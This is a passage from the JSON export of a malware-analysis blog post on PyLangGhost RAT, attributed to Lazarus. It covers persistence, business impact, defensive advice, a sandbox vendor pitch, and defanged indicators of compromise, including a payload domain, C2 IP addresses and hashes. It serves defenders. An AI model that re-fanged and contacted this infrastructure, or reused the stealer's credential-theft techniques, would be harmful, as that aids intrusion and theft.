             <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"C4\"\n                    data-col-index=\"2\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Gains persistence via registry entries created by the\u00a0update.vbs\u00a0script.\u00a0                    <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-248'>\ntable#wpdtSimpleTable-248{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-248 td, table.wpdtSimpleTable248 th { white-space: normal !important; }\n<\/style>\n\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"277\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/19-1024x277.png\" alt=\"\" class=\"wp-image-15312\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/19-1024x277.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/19-300x81.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/19-768x208.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/19-1536x415.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/19-2048x554.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/19-370x100.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/19-270x73.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/19-740x200.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>MITRE ATT&amp;CK Matrix<\/em><\/figcaption><\/figure><\/div>\n\n\n<h2 class=\"wp-block-heading\">Business Impact of PyLangGhost RAT&nbsp;<\/h2>\n\n\n\n<p>PyLangGhost RAT poses a significant risk to organizations in the technology, finance, and cryptocurrency sectors, with potential consequences including:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Financial losses: <\/strong>Compromised cryptocurrency wallets and stolen credentials can lead directly to asset theft and fraudulent transactions.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Data breaches:<\/strong> Exfiltration of sensitive corporate data, browser-stored credentials, and internal documents can expose intellectual property, customer information, and strategic plans.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Operational disruption: <\/strong>Persistent remote access allows attackers to move laterally, deploy additional payloads, and disrupt business-critical systems.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Reputational damage:<\/strong> Public disclosure of a breach tied to a high-profile state-sponsored group can undermine client trust and brand credibility.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Regulatory consequences: <\/strong>Data theft incidents may trigger compliance violations (e.g., GDPR, CCPA, financial regulations) resulting in legal penalties and reporting obligations.&nbsp;<\/li>\n<\/ul>\n\n\n\n<p>Given its low detection rate and targeted social engineering approach, PyLangGhost RAT enables attackers to operate inside a network for extended periods before discovery, increasing both the scope and cost of an incident.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">How to Fight Against PyLangGhost RAT&nbsp;<\/h2>\n\n\n\n<p>Defending against PyLangGhost RAT requires a combination of proactive detection, security awareness, and layered defenses:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Use behavior-based analysis:<\/strong> Solutions like&nbsp;<strong><a href=\"https:\/\/any.run\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=pylangghost_rat&amp;utm_term=060825&amp;utm_content=linktolanding\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN\u2019s Interactive Sandbox<\/a><\/strong>&nbsp;can detect PyLangGhost RAT in minutes by exposing its execution chain, raw IP C2 connections, and credential theft activity.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Validate unexpected commands: <\/strong>Educate employees to never run commands or scripts provided during job interviews or online \u201ctechnical tests\u201d without verification from security teams.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Restrict administrative privileges:<\/strong> Limit the ability for standard users to run processes with elevated rights, reducing the malware\u2019s ability to retrieve encrypted browser keys.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Monitor for anomalous network traffic:<\/strong> Look for unusual outbound connections to raw IPs or rapid repeated HTTP requests from unexpected processes.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Harden browser data security: <\/strong>Apply policies to clear cookies and credentials regularly, disable unneeded browser extensions, and enforce hardware-backed encryption where available.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Incident response readiness: <\/strong>Maintain a process for rapid sandbox testing of suspicious files or scripts to shorten investigation times and reduce business impact.&nbsp;<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Spot Similar Threats Early, Minimizing Business Risk&nbsp;<\/h2>\n\n\n\n<p>When facing dangerous malware like PyLangGhost RAT,&nbsp;<strong>speed of detection <\/strong>is important. Every minute an attacker remains undetected increases the chances of stolen data, financial loss, and operational disruption.&nbsp;<\/p>\n\n\n\n<p><strong><a href=\"https:\/\/any.run\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=pylangghost_rat&amp;utm_term=060825&amp;utm_content=linktolanding\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN\u2019s Interactive Sandbox<\/a><\/strong>&nbsp;helps organizations identify and analyze threats like PyLangGhost RAT within minutes, combining real-time execution tracking with behavior-based detection to uncover even low-detection or newly emerging malware.&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Rapid incident response: <\/strong>Detect threats early to stop lateral movement, data exfiltration, and further compromise.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Lower investigation costs: <\/strong>Automated analysis delivers verdicts quickly, reducing the time and resources needed for manual investigation.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Faster, smarter decisions:<\/strong> Clear visualized execution flows help security teams assess impact and choose the right containment measures.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Increased SOC efficiency: <\/strong>Streamlines detection, analysis, and reporting in one workflow, eliminating unnecessary manual steps.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Proactive threat hunting: <\/strong>Flags stealthy or low-signature artifacts, enabling defenders to identify and block similar threats before they spread.&nbsp;<\/li>\n<\/ul>\n\n\n\n<p>Early detection for business means lower risk, reduced costs, and stronger resilience against advanced cyberattacks.&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/any.run\/demo\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=pylangghost_rat&amp;utm_term=060825&amp;utm_content=linktodemo\" target=\"_blank\" rel=\"noreferrer noopener\">Try ANY.RUN to see how it can strengthen your proactive defense<\/a>&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Gathered IOCs&nbsp;<\/h2>\n\n\n\n<p>Domain: 360scanner[.]store <\/p>\n\n\n\n<p>IPv4: 13[.]107.246[.]45 <\/p>\n\n\n\n<p>IPv4: 151[.]243.101[.]229&nbsp;<\/p>\n\n\n\n<p>URL: https[:]\/\/360scanner[.]store\/cam-v-b74si.fix <\/p>\n\n\n\n<p>URL: http[:]\/\/151[.]243[.]101[.]229[:]8080\/&nbsp;<\/p>\n\n\n\n<p>SHA256 (auto.py.bin) = bb794019f8a63966e4a16063dc785fafe8a5f7c7553bcd3da661c7054c6674c7&nbsp;<\/p>\n\n\n\n<p>SHA256 (command.py.bin) = c4fd45bb8c33a5b0fa5189306eb65fa3db53a53c1092078ec62f3fc19bc05dcb&nbsp;<\/p>\n\n\n\n<p>SHA256 (config.py.bin) = c7ecf8be40c1e9a9a8c3d148eb2ae2c0c64119ab46f51f603a00b812a7be3b45&nbsp;<\/p>\n\n\n\n<p>SHA256 (nvidia.py.bin) = a179caf1b7d293f7c14021b80deecd2b42bbd409e052da767e0d383f71625940&nbsp;<\/p>\n\n\n\n<p>SHA256 (util.py.bin) = ef04a839f60911a5df2408aebd6d9af432229d95b4814132ee589f178005c72f&nbsp;<\/p>\n\n\n\n<p>FileName: chrome_logins_dump.txt FileName: gather.tar.gz Mutex:.store&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Further Reading&nbsp;<\/h2>\n\n\n\n<p>https:\/\/otx.alienvault.com\/pulse\/688186afb933279c4be00337<\/p>\n\n\n\n<p><a href=\"https:\/\/app.any.run\/tasks\/275e3573-0b3e-4e77-afaf-fe99b935c510\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=pylangghost_rat&amp;utm_term=060825&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/app.any.run\/tasks\/275e3573-0b3e-4e77-afaf-fe99b935c510<\/a>&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/www.virustotal.com\/gui\/file\/a179caf1b7d293f7c14021b80deecd2b42bbd409e052da767e0d383f71625940\/detection\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">https:\/\/www.virustotal.com\/gui\/file\/a179caf1b7d293f7c14021b80deecd2b42bbd409e052da767e0d383f71625940\/detection&nbsp;<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/www.virustotal.com\/gui\/file\/c7ecf8be40c1e9a9a8c3d148eb2ae2c0c64119ab46f51f603a00b812a7be3b45?nocache=1\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">https:\/\/www.virustotal.com\/gui\/file\/c7ecf8be40c1e9a9a8c3d148eb2ae2c0c64119ab46f51f603a00b812a7be3b45?nocache=1<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/www.virustotal.com\/gui\/file\/c4fd45bb8c33a5b0fa5189306eb65fa3db53a53c1092078ec62f3fc19bc05dcb\/community\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">https:\/\/www.virustotal.com\/gui\/file\/c4fd45bb8c33a5b0fa5189306eb65fa3db53a53c1092078ec62f3fc19bc05dcb\/community<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Editor\u2019s note:&nbsp;The current article is authored by Mauro Eldritch, offensive security expert and threat intelligence analyst. You can&nbsp;find Mauro on X.&nbsp; North Korean state-sponsored groups, such as Lazarus, continue to target the financial and cryptocurrency sectors with a variety of custom malware families. In previous research, we examined strains like InvisibleFerret, Beavertail, and OtterCookie, often [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":15291,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8],"tags":[57,10,77,34],"class_list":["post-15287","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-malware-analysis","tag-anyrun","tag-cybersecurity","tag-guest-post","tag-malware-analysis"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.10 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>PyLangGhost RAT: Rising Stealer from Lazarus Group Striking Finance and Technology\u00a0 - ANY.RUN&#039;s Cybersecurity Blog<\/title>\n<meta name=\"description\" content=\"Discover analysis of PyLangGhost RAT, the newest Lazarus Group malware targeting finance and tech professionals.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/any.run\/cybersecurity-blog\/pylangghost-malware-analysis\/\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Mauro Eldritch\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"16 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/pylangghost-malware-analysis\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/pylangghost-malware-analysis\/\"},\"author\":{\"name\":\"Mauro Eldritch\",\"@id\":\"https:\/\/any.run\/\"},\"headline\":\"PyLangGhost RAT: Rising Stealer from Lazarus Group Striking Finance and Technology\u00a0\",\"datePublished\":\"2025-08-06T10:31:04+00:00\",\"dateModified\":\"2025-08-06T13:47:54+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/pylangghost-malware-analysis\/\"},\"wordCount\":3254,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/any.run\/\"},\"keywords\":[\"ANYRUN\",\"cybersecurity\",\"guest post\",\"malware analysis\"],\"articleSection\":[\"Malware Analysis\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/any.run\/cybersecurity-blog\/pylangghost-malware-analysis\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/pylangghost-malware-analysis\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/pylangghost-malware-analysis\/\",\"name\":\"PyLangGhost RAT: Rising Stealer from Lazarus Group Striking Finance and Technology\u00a0 - ANY.RUN&#039;s Cybersecurity Blog\",\"isPartOf\":{\"@id\":\"https:\/\/any.run\/\"},\"datePublished\":\"2025-08-06T10:31:04+00:00\",\"dateModified\":\"2025-08-06T13:47:54+00:00\",\"description\":\"Discover analysis of PyLangGhost RAT, the newest Lazarus Group malware targeting finance and tech professionals.\",\"breadcrumb\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/pylangghost-malware-analysis\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/any.run\/cybersecurity-blog\/pylangghost-malware-analysis\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/pylangghost-malware-analysis\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/any.run\/cybersecurity-blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Malware Analysis\",\"item\":\"https:\/\/any.run\/cybersecurity-blog\/category\/malware-analysis\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"PyLangGhost RAT: Rising Stealer from Lazarus Group Striking Finance and Technology\u00a0\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/\",\"name\":\"ANY.RUN&#039;s Cybersecurity Blog\",\"description\":\"Cybersecurity Blog covers topics for experienced professionals as well as for those new to it.\",\"publisher\":{\"@id\":\"https:\/\/any.run\/\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/any.run\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/any.run\/\",\"name\":\"ANY.RUN\",\"url\":\"https:\/\/any.run\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg\",\"contentUrl\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg\",\"width\":1,\"height\":1,\"caption\":\"ANY.RUN\"},\"image\":{\"@id\":\"https:\/\/any.run\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/www.any.run\/\",\"https:\/\/twitter.com\/anyrun_app\",\"https:\/\/www.linkedin.com\/company\/30692044\",\"https:\/\/www.youtube.com\/channel\/UCOgCPho7lzmH7m6fPNlukrQ\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/any.run\/\",\"name\":\"Mauro Eldritch\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/01\/Mauro-copy.jpeg\",\"contentUrl\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/01\/Mauro-copy.jpeg\",\"caption\":\"Mauro Eldritch\"},\"description\":\"Mauro Eldritch is an Argentinian-Uruguayan hacker, founder of BCA LTD and DC5411 (Argentina \/ Uruguay). He has spoken at various events, including DEF CON (12 times). He is passionate about Threat Intelligence and Biohacking.\u00a0He currently leads Bitso\u2019s Quetzal Team, the first in Latin America dedicated to Web3 Threat Research. Follow Mauro on: X LinkedIn GitHub\",\"url\":\"#molongui-disabled-link\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"PyLangGhost RAT: Rising Stealer from Lazarus Group Striking Finance and Technology\u00a0 - ANY.RUN&#039;s Cybersecurity Blog","description":"Discover analysis of PyLangGhost RAT, the newest Lazarus Group malware targeting finance and tech professionals.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/any.run\/cybersecurity-blog\/pylangghost-malware-analysis\/","twitter_misc":{"Written by":"Mauro Eldritch","Est. reading time":"16 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/any.run\/cybersecurity-blog\/pylangghost-malware-analysis\/#article","isPartOf":{"@id":"https:\/\/any.run\/cybersecurity-blog\/pylangghost-malware-analysis\/"},"author":{"name":"Mauro Eldritch","@id":"https:\/\/any.run\/"},"headline":"PyLangGhost RAT: Rising Stealer from Lazarus Group Striking Finance and Technology\u00a0","datePublished":"2025-08-06T10:31:04+00:00","dateModified":"2025-08-06T13:47:54+00:00","mainEntityOfPage":{"@id":"https:\/\/any.run\/cybersecurity-blog\/pylangghost-malware-analysis\/"},"wordCount":3254,"commentCount":0,"publisher":{"@id":"https:\/\/any.run\/"},"keywords":["ANYRUN","cybersecurity","guest post","malware analysis"],"articleSection":["Malware Analysis"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/any.run\/cybersecurity-blog\/pylangghost-malware-analysis\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/any.run\/cybersecurity-blog\/pylangghost-malware-analysis\/","url":"https:\/\/any.run\/cybersecurity-blog\/pylangghost-malware-analysis\/","name":"PyLangGhost RAT: Rising Stealer from Lazarus Group Striking Finance and Technology\u00a0 - ANY.RUN&#039;s Cybersecurity Blog","isPartOf":{"@id":"https:\/\/any.run\/"},"datePublished":"2025-08-06T10:31:04+00:00","dateModified":"2025-08-06T13:47:54+00:00","description":"Discover analysis of PyLangGhost RAT, the newest Lazarus Group malware targeting finance and tech professionals.","breadcrumb":{"@id":"https:\/\/any.run\/cybersecurity-blog\/pylangghost-malware-analysis\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/any.run\/cybersecurity-blog\/pylangghost-malware-analysis\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/any.run\/cybersecurity-blog\/pylangghost-malware-analysis\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/any.run\/cybersecurity-blog\/"},{"@type":"ListItem","position":2,"name":"Malware Analysis","item":"https:\/\/any.run\/cybersecurity-blog\/category\/malware-analysis\/"},{"@type":"ListItem","position":3,"name":"PyLangGhost RAT: Rising Stealer from Lazarus Group Striking Finance and Technology\u00a0"}]},{"@type":"WebSite","@id":"https:\/\/any.run\/","url":"https:\/\/any.run\/","name":"ANY.RUN&#039;s Cybersecurity Blog","description":"Cybersecurity Blog covers topics for experienced professionals as well as for those new to it.","publisher":{"@id":"https:\/\/any.run\/"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/any.run\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/any.run\/","name":"ANY.RUN","url":"https:\/\/any.run\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/any.run\/","url":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg","contentUrl":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg","width":1,"height":1,"caption":"ANY.RUN"},"image":{"@id":"https:\/\/any.run\/"},"sameAs":["https:\/\/www.facebook.com\/www.any.run\/","https:\/\/twitter.com\/anyrun_app","https:\/\/www.linkedin.com\/company\/30692044","https:\/\/www.youtube.com\/channel\/UCOgCPho7lzmH7m6fPNlukrQ"]},{"@type":"Person","@id":"https:\/\/any.run\/","name":"Mauro Eldritch","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/any.run\/","url":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/01\/Mauro-copy.jpeg","contentUrl":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/01\/Mauro-copy.jpeg","caption":"Mauro Eldritch"},"description":"Mauro Eldritch is an Argentinian-Uruguayan hacker, founder of BCA LTD and DC5411 (Argentina \/ Uruguay). He has spoken at various events, including DEF CON (12 times). He is passionate about Threat Intelligence and Biohacking.\u00a0He currently leads Bitso\u2019s Quetzal Team, the first in Latin America dedicated to Web3 Threat Research. Follow Mauro on: X LinkedIn GitHub","url":"#molongui-disabled-link"}]}},"_links":{"self":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/15287"}],"collection":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/comments?post=15287"}],"version-history":[{"count":16,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/15287\/revisions"}],"predecessor-version":[{"id":15331,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/15287\/revisions\/15331"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/media\/15291"}],"wp:attachment":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/media?parent=15287"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/categories?post=15287"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/tags?post=15287"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}